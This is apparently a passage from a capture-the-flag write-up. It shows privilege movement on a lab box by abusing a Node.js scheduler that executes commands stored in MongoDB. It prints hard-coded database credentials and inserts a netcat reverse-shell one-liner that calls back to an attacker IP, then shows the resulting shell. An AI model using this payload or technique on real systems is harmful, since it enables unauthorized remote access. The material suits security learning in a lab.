5 mark > tom
# explored a lot of stuff
# reusing password
# connecting mongo failed with mark creds
# looking at processes running as tom
mark@node:/opt$ ps fuaxwww | grep tom
mark 23909 0.0 0.1 14228 940 pts/0 S+ 19:15 0:00 \_ grep --color=auto tom
tom 1225 5.5 5.7 1045320 43720 ? Ssl 18:20 3:01 /usr/bin/node /var/www/myplace/app.js
tom 1229 0.0 4.0 1074616 30708 ? Ssl 18:20 0:01 /usr/bin/node /var/scheduler/app.jsmark@node:/opt$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});# this script runs like a CRON and checks for any new record that is entered
# runs the value in the 'cmd' key.
$ mongosh --host localhost -u mark -p 5AYRft73VtFpc84k scheduler
Current Mongosh Log ID: 614a235a4a2af76aa870faa9
Connecting to: mongodb://localhost:27017/scheduler?directConnection=true&serverSelectionTimeoutMS=2000
Using MongoDB: 3.2.16
Using Mongosh: 1.0.6
scheduler> show dbs
MongoServerError: not authorized on admin to execute command { listDatabases: 1 }
scheduler> show collections
tasks
scheduler> db.tasks.find({})
scheduler> db.tasks.insert({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f"})
DeprecationWarning: Collection.insert() is deprecated. Use insertOne, insertMany, or bulkWrite.
{
acknowledged: true,
insertedIds: { '0': ObjectId("614a24be65c51bfc6927c5cc") }
}
scheduler> db.tasks.find({})
[
{
_id: ObjectId("614a24be65c51bfc6927c5cc"),
cmd: 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f'
}
]
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.58] 32822
bash: cannot set terminal process group (1229): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ whoami;id
whoami;id
tom
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)Last updated